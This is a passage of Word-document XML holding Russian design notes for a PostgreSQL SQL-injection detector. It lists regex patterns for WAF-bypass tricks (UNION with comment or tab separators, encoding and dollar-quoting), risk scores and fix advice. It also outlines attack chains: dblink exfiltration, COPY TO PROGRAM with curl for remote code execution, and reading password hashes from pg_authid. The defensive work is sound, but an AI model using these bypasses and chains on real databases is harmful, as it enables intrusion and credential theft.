          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.6 UNION через /**/ как разделитель</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bUNION\s*/\*[^*]*\*/\s*SELECT\b|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.6 UNION через не-space whitespace (tab/CR/LF/FF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bUNION[\t\r\n\f]+SELECT\b",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if _RE["filter_bypass_high"].search(sql):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vulnerability_class=VulnerabilityClass.FILTER_BYPASS,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос содержит encoding-приём (chr-цепочка, "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "Unicode-escape, E-strings hex/octal byte-literals или "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "decode с длинной hex/base64-строкой) — паттерн обхода "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "input-фильтра WAF или sanitizer-а.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="В application-коде эти конструкции не нужны (для "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "binary-данных используются параметризованные bytea, "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "не текстовый decode-hex). Проверьте источник payload-а — "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "если приходит от пользователя, удалите конкатенацию и "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "перейдите на параметризацию.",</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elif _RE["filter_bypass_mid"].search(sql):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vulnerability_class=VulnerabilityClass.FILTER_BYPASS,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=6,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос содержит dollar-quoted блок с опасной функцией внутри "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "(dblink, pg_read*, pg_authid, EXECUTE, COPY) или UNION с "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "альтернативным whitespace (/**/, tab, CR) — паттерн "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "доставки payload-а через input-фильтр.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Dollar-quoting легитимен в plpgsql-функциях, но в "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "runtime-сгенерированном SQL приложения — индикатор "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "ручной сборки. UNION с /**/-разделителем — почти "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "всегда WAF-bypass-попытка.",</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Градация risk обоснована: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filter_bypass_high</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Encoding-приёмы (chr/U&amp;/E-string/decode) практически не имеют легитимных use case в application-коде. Bytea параметризируется напрямую через драйверный bytea-биндинг; UTF-8 normalisation — через серверный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">convert(... USING utf8_to_utf8)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не через ручную hex-склейку.</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filter_bypass_mid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Dollar-quoting встречается в migration-скриптах и в plpgsql-функциях легитимно, но в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-сгенерированном SQL приложения — индикатор. UNION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non-space whitespace — почти всегда атака; одно правильное use case — generator кода (ORM, тесты), который проверяется по AST, а не статически.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">risk ниже, чем у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (9-10) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">METADATA_RECON_HIGH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (10), потому что 3.9 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обходка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не атака сама по себе. Финальная категория (3.6 / 3.7 / 3.8) сама поднимет risk до 9-10. Если 3.9-сигнал срабатывает изолированно, без соседних </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">oob_exfil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meta_recon_high</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copy_from_program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это «странный SQL», но не обязательно атака; LLM-судья принимает решение по совокупности.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Порядок проверки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">high → mid</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elif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> гарантирует, что для запроса с E-string + dollar-quote сработает только high-ветка (risk 8), а не каскад.</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R5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Dollar-quoted strings: PostgreSQL Lexical Structure §4.1.2.4 (3.9.1).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R6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2025-1094 SQL injection в psql через невалидный UTF-8 (3.9.7): PostgreSQL advisory, Rapid7 disclosure 13 февраля 2025, SecureLayer7 разбор. CVSS 8.1; CVE применяется только к chain-ам через psql, не к серверу.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Общие:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy (SQLi cheat sheet — encoding bypass, whitespace bypass), HackTricks PostgreSQL Injection (encoding tricks), OWASP SQL Injection Bypassing WAF (general WAF bypass catalogue), PostgreSQL Lexical Structure §4.1 (комментарии, whitespace, case-rules, Unicode-escape, dollar-quoting, E-strings — все 3.9-разделы лексически базируются на этом документе), SQL:2003 §5.3 (Unicode delimiter).</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3.9.1 Payload B (DO-блок) — основной приём обхода extended-protocol ограничения на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-stacking. 3.9.6 Payload A/B (whitespace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tab) применим, когда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тоже фильтруется как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 alternative-whitespace проталкивает stacked queries.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3.6.x (OOB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.9.1/3.9.2/3.9.5 — основные обходные техники для доставки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dblink_connect(...)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через WAF-блоки на имена опасных функций. 3.6 без 3.9 в большинстве реальных WAF-окружений не проходит.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FROM/TO PROGRAM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — после прохода 3.9.5 (decode hex для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY ... TO PROGRAM 'curl ...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — RCE без подстроки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в payload-тексте. 3.9.7 + 3.7.1 — chain CVE-2025-1094 → COPY TO PROGRAM (R21).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3.8.3 (pg_authid / pg_shadow)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.9.5 Payload C с hex-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT rolpassword FROM pg_authid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — типичный сценарий чтения хешей после получения SUPERUSER через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3.10.1 (data-modifying CTE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.9.1 (dollar-quote) + 3.10.1 — CTE с INSERT/UPDATE в SELECT-эндпоинте, обёрнутая в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ ... END $$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для обхода stacked-protection.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 (Комментарии и edge cases)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
